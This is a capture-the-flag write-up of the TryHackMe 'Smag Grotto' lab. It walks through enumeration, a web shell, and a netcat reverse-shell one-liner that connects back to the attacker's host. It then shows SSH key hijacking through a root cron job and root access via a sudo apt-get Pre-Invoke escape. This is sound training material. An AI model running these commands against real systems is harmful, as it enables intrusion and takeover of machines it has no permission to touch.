Date: 11, June, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
$ nmap -sC -sV -p- 10.10.140.17 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-11 11:30 IST
Nmap scan report for 10.10.140.17
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
| 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 561.05 seconds$ gobuster dir -u http://10.10.140.17/ -t 50 -w /usr/share/wordlists/dirb/big.txt | tee gobuster.out===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.140.17/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/11 11:31:57 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/mail (Status: 301) [Size: 311] [--> http://10.10.140.17/mail/]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/06/11 11:33:09 Finished
===============================================================
- There is a
login.phppage atdevelopment.smag.thm - Add
development.smag.thmto/etc/hostsfile
- Login using the credentials found in the pcap file:
- Now that we have a web shell, we can get a reverse shell using:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.7.91 1234 >/tmp/f- Once you get a reverse shell, upgrade it:
root@kali:~/Desktop/CTF/TryHackMe/smaggrotto# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.155.203] 36046
/bin/sh: 0: can't access tty; job control turned off
$ ls
admin.php
login.php
materialize.min.css
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@smag:/var/www/development.smag.thm$ export TERM=xterm
export TERM=xterm
www-data@smag:/var/www/development.smag.thm$ ^Z
[1]+ Stopped nc -lvnp 1234
root@kali:~/Desktop/CTF/TryHackMe/smaggrotto# stty raw -echo;fg
nc -lvnp 1234
www-data@smag:/var/www/development.smag.thm$- To access the User flag, we need to login as
jake.
- Looking around the file system, I found jake's public key backup.
- But wait, public keys are useless. We need private key to login using ssh.
- May be we need to look for something else!
www-data@smag:/$ find / -name *id_rsa* 2>/dev/null
/opt/.backups/jake_id_rsa.pub.backup
www-data@smag:/$ cd opt
www-data@smag:/opt$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Jun 4 2020 .
drwxr-xr-x 22 root root 4096 Jun 4 2020 ..
drwxr-xr-x 2 root root 4096 Jun 4 2020 .backups
www-data@smag:/opt$ cd .backups/
www-data@smag:/opt/.backups$ ls
jake_id_rsa.pub.backup
www-data@smag:/opt/.backups$ cat jake_id_rsa.pub.backup
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5HGAnm2nNgzDW9OPAZ9dP0tZbvNrIJWa/
[..snip..]- There was a cron job which was copying the
backup keytojake's authorized keys:
www-data@smag:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys- Now generate a key pair and replace the public key with the newly generated key.
- Login using the private key:
$ ssh -i ~/.ssh/id_rsa [email protected]
The authenticity of host '10.10.171.199 (10.10.171.199)' can't be established.
ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.171.199' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Fri Jun 5 10:15:15 2020
jake@smag:~$ whoami
jake
jake@smag:~$ ls
user.txt
jake@smag:~$ cat user.txt
<REDACTED>jake@smag:~$ find / -perm -u=s 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/ping
/bin/fusermount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device- Nothing interesting here!
jake@smag:/$ sudo -l
Matching Defaults entries for jake on smag:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on smag:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get- Jake can run
apt-getas as root without password!
- Check
gtfobinsfor privilege escalation usingapt-getbinary:
jake@smag:/$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
REDACTED